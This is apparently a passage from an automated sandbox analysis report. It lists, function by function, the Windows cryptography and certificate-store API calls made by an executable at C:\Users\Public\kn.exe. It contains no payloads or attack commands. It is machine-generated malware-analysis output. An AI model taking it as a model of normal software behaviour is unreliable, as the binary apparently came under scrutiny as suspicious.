Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE64F90 LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,#357,strcmp,GetLastError,#357,CryptMsgGetAndVerifySigner,CryptVerifyDetachedMessageSignature,GetLastError,#357,CertEnumCertificatesInStore,memcmp,#357,CertFreeCertificateContext,#357,#357,CertFreeCertificateContext,strcmp,#357,CryptMsgControl,GetLastError,#357,#357,#357,#357, 25_2_00007FF67DE64F90
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFEF74 GetLastError,#357,CryptDecodeObject,GetLastError,GetLastError,GetLastError,LocalAlloc,memmove,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DEFEF74
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext, 25_2_00007FF67DEC0F58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB4F50 CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,#357,LocalFree, 25_2_00007FF67DEB4F50
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree, 25_2_00007FF67DF3EB38
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext, 25_2_00007FF67DEC8AFC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE72B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer, 25_2_00007FF67DE72B00
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError, 25_2_00007FF67DED2AE4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0ABC BCryptVerifySignature,#205,#357,#357,#357,#357, 25_2_00007FF67DED0ABC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException, 25_2_00007FF67DED8AA0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF02A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359, 25_2_00007FF67DF02A78
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE46A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree, 25_2_00007FF67DE46A84
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash, 25_2_00007FF67DEBEA7C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree, 25_2_00007FF67DEB4A34
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException, 25_2_00007FF67DED4A1C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0A18 BCryptSetProperty,#205,#359,#357,#357, 25_2_00007FF67DED0A18
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF08C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree, 25_2_00007FF67DF08C58
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree, 25_2_00007FF67DEBAA00
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9E9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW, 25_2_00007FF67DE9E9F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF14C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext, 25_2_00007FF67DF14C80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE929A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey, 25_2_00007FF67DE929A0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED099C BCryptOpenAlgorithmProvider,#205,#359,#359, 25_2_00007FF67DED099C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF02994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree, 25_2_00007FF67DF02994
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF28CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree, 25_2_00007FF67DF28CF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree, 25_2_00007FF67DE5C960
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException, 25_2_00007FF67DED8940
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEDC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException, 25_2_00007FF67DEDC940
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06D2C NCryptFreeBuffer,#360, 25_2_00007FF67DF06D2C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE92D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 25_2_00007FF67DE92D18
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0D14 NCryptFinalizeKey,#205,#357,#357, 25_2_00007FF67DED0D14
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357, 25_2_00007FF67DEC2CF8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError, 25_2_00007FF67DED2CFC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06CE0 NCryptEnumStorageProviders,#360, 25_2_00007FF67DF06CE0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE94CC0 #357,lstrcmpW,CryptEnumKeyIdentifierProperties,GetLastError,#357,LocalFree,#357,#359,LocalFree,LocalFree,free, 25_2_00007FF67DE94CC0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEDACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z, 25_2_00007FF67DEDACAC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext, 25_2_00007FF67DEC4CA0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06C88 NCryptEnumAlgorithms,#360, 25_2_00007FF67DF06C88
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError, 25_2_00007FF67DED2C80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 25_2_00007FF67DF0A9F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE36C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree, 25_2_00007FF67DE36C4C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0C3C NCryptExportKey,#205,#359,#359,#357, 25_2_00007FF67DED0C3C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06C30 NCryptOpenStorageProvider,#360, 25_2_00007FF67DF06C30
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE6CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider, 25_2_00007FF67DE6CC24
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF00BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash, 25_2_00007FF67DF00BF4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError, 25_2_00007FF67DED2BC0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFCBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree, 25_2_00007FF67DEFCBB4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle, 25_2_00007FF67DE5CB98
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF00B9C CryptHashData,GetLastError,#357, 25_2_00007FF67DF00B9C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0B80 NCryptCreatePersistedKey,#205,#359,#359,#357, 25_2_00007FF67DED0B80
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext, 25_2_00007FF67DF0A740
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC2724 CryptDecodeObject,GetLastError,#357, 25_2_00007FF67DEC2724
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE726E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357, 25_2_00007FF67DE726E0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF86D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext, 25_2_00007FF67DEF86D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF066D8 NCryptFreeObject,#360, 25_2_00007FF67DF066D8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA4694 CertFindAttribute,CryptHashCertificate2,memcmp,#357, 25_2_00007FF67DEA4694
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE66694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose, 25_2_00007FF67DE66694
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF08814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357, 25_2_00007FF67DF08814
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF06654 NCryptGetProperty,#360, 25_2_00007FF67DF06654
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore, 25_2_00007FF67DE9A654
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE60630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DE60630
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE58600 #357,CryptDecodeObject,GetLastError,LocalFree, 25_2_00007FF67DE58600
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE925E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey, 25_2_00007FF67DE925E8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5C5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree, 25_2_00007FF67DE5C5D4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3E8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree, 25_2_00007FF67DF3E8B0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED65B4 NCryptIsKeyHandle,_CxxThrowException, 25_2_00007FF67DED65B4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECE57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore, 25_2_00007FF67DECE57C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF04914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext, 25_2_00007FF67DF04914
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBE914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash, 25_2_00007FF67DEBE914
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED08EC BCryptGetProperty,#205,#359,#357,#357, 25_2_00007FF67DED08EC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3A58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject, 25_2_00007FF67DF3A58C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext, 25_2_00007FF67DF0A590
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE4A8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore, 25_2_00007FF67DE4A8CC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0844 BCryptExportKey,#205,#359,#357,#357, 25_2_00007FF67DED0844
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE56824 CryptHashCertificate,GetLastError,#357, 25_2_00007FF67DE56824
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBC7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext, 25_2_00007FF67DEBC7F0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED07F4 BCryptDestroyKey,#205,#357, 25_2_00007FF67DED07F4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE367CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DE367CC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEE07D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 25_2_00007FF67DEE07D0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC27BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DEC27BC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED07A4 BCryptDestroyHash,#205,#357, 25_2_00007FF67DED07A4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DED0740 BCryptCloseAlgorithmProvider,#205,#357,#357, 25_2_00007FF67DED0740
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE70300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357, 25_2_00007FF67DE70300
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA6280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DEA6280
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF2278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext, 25_2_00007FF67DEF2278
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFE274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 25_2_00007FF67DEFE274
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF08404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext, 25_2_00007FF67DF08404
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DECE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject, 25_2_00007FF67DECE1F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEBA1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree, 25_2_00007FF67DEBA1E8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEF61AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357, 25_2_00007FF67DEF61AC
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE721A4 #360,#359,#357,#357,BCryptFreeBuffer, 25_2_00007FF67DE721A4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEB6194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext, 25_2_00007FF67DEB6194
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE9417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey, 25_2_00007FF67DE9417C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF3613C CryptDecodeObjectEx, 25_2_00007FF67DF3613C
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEFE516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z, 25_2_00007FF67DEFE516
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE5C514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree, 25_2_00007FF67DE5C514
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DE444E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DE444E0
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEA24D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext, 25_2_00007FF67DEA24D4
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEC8488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree, 25_2_00007FF67DEC8488
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF0A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357, 25_2_00007FF67DF0A1F8
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DF36214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError, 25_2_00007FF67DF36214
Source: C:\Users\Public\kn.exe Code function: 25_2_00007FF67DEAA450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free, 25_2_00007FF67DEAA450
